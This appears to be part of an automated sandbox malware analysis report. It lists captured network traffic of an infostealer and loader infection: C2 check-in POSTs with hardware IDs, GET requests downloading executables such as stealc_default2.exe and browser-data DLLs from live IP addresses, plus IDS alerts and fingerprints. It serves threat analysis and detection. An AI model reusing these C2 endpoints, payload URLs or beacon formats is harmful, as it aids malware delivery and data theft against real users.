Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"save------HDGCFHIDAKECFHIEBFCG--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="build"save------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build"save------JEBKECAFIDAFIECBKEHD--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.202.233.158 91.202.233.158
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: M247GB M247GB
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49603 -> 185.215.113.117:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49605 -> 194.116.215.195:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49611 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49615 -> 185.215.113.117:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49609 -> 185.215.113.26:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49616 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49620 -> 185.215.113.117:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49623 -> 185.215.113.117:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49626 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49629 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49632 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49634 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49637 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49640 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49651 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49659 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49646 -> 104.21.64.194:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=ufsw2WljgNe0HeEnxGfuql1fqO2W1xBNgPBmcLBXHDE-1727446725-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: drawzhotdog.shop
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0020BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile, 6_2_0020BD60
Source: global traffic HTTP traffic detected: GET /file1.exe HTTP/1.1Host: glthub.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/Microsoft-Edge.exe HTTP/1.1Host: eijfrhegrtbrfcd.online
Source: global traffic HTTP traffic detected: GET /download/conf1.php HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
